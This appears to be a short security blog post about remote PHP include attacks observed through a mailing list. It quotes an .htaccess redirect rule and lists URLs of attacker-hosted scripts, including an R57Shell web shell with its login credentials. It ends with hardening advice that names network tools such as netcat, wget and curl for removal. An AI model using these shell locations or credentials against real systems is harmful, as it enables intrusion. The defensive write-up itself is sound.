Remote PHP Includes

Some of the most delightful things come via public mailing lists.

This goody brought to you by Dave Arrowsmith via the Whitestar List.

"I implimented [sic] a .htaccess Rule to 301 redirect of libwww-perl etc to google.com

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl.*$ [NC]
RewriteRule \.*$ http://www.google.com [R,L]

and so they came..."

Probably not the greatest idea to redirect all of your attacks towards an innocent party, http://0.0.0.0/ would have worked just as well.
In the end Dave had a couple scripts directed at what I only assume are phpbb installs:

http:// www.kinkware.com /shop /pub /error.txt - R57Shell - password protected - user: mike pass: rico

Dave contacted Kinkware, who had this to say:

Hi,

We will investigate this issue. In the mean time can you please
provide us your IP address so we can block all traffic to
your address so that you are not affected by this.
Regards,

Tarinder Singh, Systems Administrator
Net Logistics Pty. Ltd.
http://www.netlogistics.com.au

Some others he saw but did not contact:

http:// usuarios.arnet.com.ar / larry123/safe.txt - php id script.
http:// 71.102.93.10 /WTS /bin /hak/idpitbull.txt - another php id script.
http:// www.compassolutions.com /navegacion/id.txt - another id script.
http:// www.yesevent.org /tmp/echo3 - yet another php id script.
http:// coyoteco.iespana.es /cmd.txt - ...one last php id script.
http:// www.tukangbecak.com /ban.gif - Safemode check script.
http:// sapikeren.net /yogya-carder/ indonesia/Themes/nebula/temp - Another PHP Safemode check script.

So lets recap:

Dave helped protect himself by redirecting perl user agents elsewhere.
Dave SHOULD redo his .htaccess file to keep from reflecting his attacks to an innocent person.
You should follow suit. Further more, if not required, remove access to: perl, python, ruby, C(++), Java, curl, wget, socat, netcat, cryptcat, ftp, sftp, and telnet. Then drop outbound requests to ports < 1024